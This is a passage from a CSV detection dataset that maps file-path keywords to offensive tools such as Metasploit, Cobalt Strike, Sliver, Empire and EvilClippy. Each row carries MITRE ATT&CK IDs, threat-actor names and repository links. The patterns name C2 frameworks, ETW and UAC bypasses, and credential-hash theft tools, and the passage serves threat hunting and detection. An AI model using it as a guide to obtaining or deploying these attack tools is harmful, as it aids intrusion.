TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_shares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_snmp.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/EnumCLR.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/enumerate.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*/enumerate/enumerate.py*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*/enumeration/azureAd.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/enumeration/azureAzService.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/enumeration/subdomain.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/enumeration/userenum.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/epmd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/eppc-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Erebus/*.dll*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*/Erebus/*.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*/Erebus-email.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*/etc/passwd*/.sudo_as_admin_successful*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*/EternalHushCore.dll*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*/EternalHushFramework.git*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*/etumbot.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/etw.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/etw.x64.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/etw.x86.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/etw-fuck.cpp*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*/etw-fuck.exe*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*/ETWHash/*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"*/evasion/evasion.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/evasion/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/evasion_linux.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/evasion_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/EventViewerUAC/*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*/EventViewerUAC/*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" +"*/EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*/evil.cpp*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*/evil.dll*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*/evil_pdf/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/EvilClippy*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/evilclippy.cs*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*/EvilClippy.git*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*/evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*/evilhost:*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - 